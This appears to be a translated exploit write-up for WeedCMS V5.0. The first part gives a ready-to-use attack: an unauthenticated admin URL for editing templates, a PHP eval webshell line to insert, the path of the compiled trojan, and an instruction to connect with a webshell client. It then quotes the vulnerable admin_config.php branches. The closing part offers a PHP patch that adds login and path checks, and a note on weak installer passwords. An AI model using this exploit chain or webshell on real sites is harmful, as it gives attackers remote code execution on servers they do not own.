The latest version, WeedCMS V5.0, was released on 2011-1-1.
http://www.bkjia.com/admin.php?action=config&do=template_edit&file=part_vote.html
With the parameters constructed this way, the template editor for the part_vote.html block can be accessed directly, without any authentication.
Insert the line <?eval($_POST[Insun]);?> and the module is updated successfully; the homepage cache is generated the next time the homepage is accessed.
Finally, the trojan is at http://127.0.0.1/temps/compile/part_vote.html.php.
Fatal error: Using $this when not in object context. $this has no context because the class is not instantiated.
The error does not matter. Just connect with lanker.
We recommend that you do not destroy and clear traces.
Batch powered by weedcms
The problem occurs in mongodes/admin_config.php.
// Edit the template (no login check precedes this branch)
if ($do == 'template_edit') {
    $file = empty($_GET['file']) ? '' : trim($_GET['file']);
    if (get_ext($file) != 'html' && get_ext($file) != 'css') {
        exit('Sorry, the parameter is invalid!');
    }
    $content = file_get_contents('templates/' . $config['site_template'] . '/' . $file);
    $smarty = new smarty(); smarty_header();
    $smarty->assign('file', $file);
    $smarty->assign('content', $content);
    $smarty->display('template_info.htm');
}
// Update the template (no login check here either, and no extension check on the write)
if ($do == 'template_update') {
    $file = empty($_POST['file']) ? '' : trim($_POST['file']);
    $file = 'templates/' . $config['site_template'] . '/' . $file;
    $content = empty($_POST['content']) ? '' : trim($_POST['content']);
    if (get_ext($file) == 'html') {
        clear_cache($file);
    }
    // Writes the request body to the path taken from the request
    file_put_contents($file, $content);
    message(array('text' => $language['template_update_is_success'], 'link' => '?action=config&do=template_list'));
}
?>
Neither of these two operations performs an authentication check, while the other if branches do. Fix: add the check to both.
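One way to apply that fix to both branches, as an added example that is not WeedCMS's own code: the guard requires a logged-in admin and also confines file to an existing .html/.css file inside the template directory, because the update branch above writes to whatever path the request supplies. It assumes PHP 7.1+ and a started session; the function names and the session key admin_id are hypothetical.

```php
<?php
// Added example, not WeedCMS code. Assumes PHP 7.1+ and a started session;
// the session key 'admin_id' is hypothetical: reuse the check the other
// admin branches already perform.

function is_admin_logged_in(): bool
{
    return !empty($_SESSION['admin_id']); // hypothetical session key
}

// Map a user-supplied name to an existing file directly inside $template_dir.
// Returns null unless it is a plain NAME.html / NAME.css with no path parts.
function resolve_template(string $template_dir, $name): ?string
{
    if (!is_string($name)
        || !preg_match('/\A[A-Za-z0-9_-]+\.(html|css)\z/', $name)) {
        return null;
    }
    $base = realpath($template_dir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves symlinks, so a link pointing outside is rejected too.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Call first in BOTH branches; returns the only path the branch may touch.
function guard_template_action(string $do, string $template_dir): string
{
    if (!is_admin_logged_in()) {
        http_response_code(403);
        exit('Login required');
    }
    // Reads take the name from the query string, writes from a POST body only.
    $is_update = ($do === 'template_update');
    if ($is_update && ($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST') {
        http_response_code(405);
        exit('POST required');
    }
    $path = resolve_template($template_dir, ($is_update ? $_POST : $_GET)['file'] ?? null);
    if ($path === null) {
        exit('Sorry, the parameter is invalid!');
    }
    return $path;
}
```

In the handler, $file = guard_template_action($do, 'templates/' . $config['site_template']); replaces the lines that build $file from the request in each branch.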
Another problem is that the CMS installer may produce weak passwords. If the administrator does not understand this, or picks something simple for convenience, there will be problems.
Fix: add a verification code (CAPTCHA) or change the admin back-end path.